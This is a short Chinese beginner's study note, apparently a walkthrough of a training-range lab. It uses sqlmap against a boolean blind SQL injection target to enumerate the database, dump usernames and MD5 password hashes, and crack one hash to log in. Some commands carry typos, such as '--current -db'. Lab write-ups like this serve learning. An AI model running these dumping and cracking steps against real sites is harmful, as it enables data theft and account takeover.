本人小白 仅仅作为学习笔记 希望通过一次次的记录可以一次次的成长
sqlmap是一个自动化的sql注入工具,主要功能是扫描发现并利用注入漏洞
使用墨者学院的靶机进行测试 这里我们使用的是SQL注入漏洞测试(布尔盲注)
通过滚动条找到注入点
然后我们使用的是kali下的工具sqlmap
sqlmap -u http://219.153.49.228:46473/new_list.php?id=1
然后我们直接爆出数据库名字
sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 --current -db
爆出数据库名字为 stormgroup
然后报表名
sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup --tables
爆出两个表 mumber notice
然后爆出表下的列名
sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup -T member --columns
这里爆出一个name 一个password 也就是我们需要的
然后我们爆出密码和用户名
sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup -T member -C name,password --dump
然后去百度md5解密可以得到第二个密码可以登录
完成。